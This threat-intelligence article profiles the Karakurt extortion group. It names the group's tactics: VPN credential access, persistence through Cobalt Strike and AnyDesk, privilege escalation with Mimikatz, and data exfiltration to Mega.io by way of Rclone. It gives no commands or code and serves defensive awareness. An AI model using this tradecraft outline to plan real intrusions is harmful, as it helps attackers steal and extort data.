Karakurt

Karakurt is a newly established cybercrime group that in just a couple of months has managed to hit over 40 victims. Unlike the majority of financially-motivated APT groups, Karakurt doesn't encrypt the data of its victims via a ransomware threat. Instead, its operations are focused on exfiltrating sensitive data from the breached systems and then extorting the victims by threatening to release the obtained information to the public.

Another distinct characteristic of Karakurt is that the hackers have deviated from the typical approach of targeting big corporations or critical infrastructure services. Instead, the hackers are exhibiting a faster approach where they compromise smaller companies or corporate subsidiaries. This allows Karakurt to move to the next victim quickly. So far, the majority of the compromised organizations have been from North America, with Europe being a distant second.

Adaptive Threatening Tactics

The Karakurt hackers also have displayed the ability to adopt new techniques rapidly and switch the used malware threats. According to the infosec researchers at Accenture Security who have been monitoring the activities of the group, Karakurt employs legitimate VPN credentials as an initial access vector. However, sp far it has not been determined how the hackers obtain these credentials.

Once inside the network, the cybercriminals achieve persistence, try to move laterally, and exploit tools or features already existing on the targeted environment, an approach known as 'living off the land.' For persistence, Karakurt has been observed using multiple different methods. Initially, those included service creation, deploying remote-management tools and spreading backdoor threats across the victim's systems, such as Cobalt Strike beacons. However, more recent Karakurt operations have dropped Cobalt Strike and instead establish persistence through the network via VPN IP pool and AnyDesk, a remote desktop application. If the hackers fail to acquire elevated privileges through the possessed credentials, they will try to do so by deploying Mimikatz or using PowerShell.

Data Theft

The final step in the attack is the exfiltration of the victim's data. The chosen files are first compressed through either 7zip or WinZip. Afterward, Rclone of FileZilla (SFTP) is used for stating before the information is ultimately exfiltrated to the Mega.io cloud storage. According to researchers, two directories that were used in the staging stage of the data exfiltration are C:\Perflogs and C:\Recovery.

The group has set up two data-leak sites as early as June 2021, months before their first threatening operations. The two sites identified by infosec researchers are karakurt.group and karakurt.tech. The hacker group also has a Twitter account that was created in August.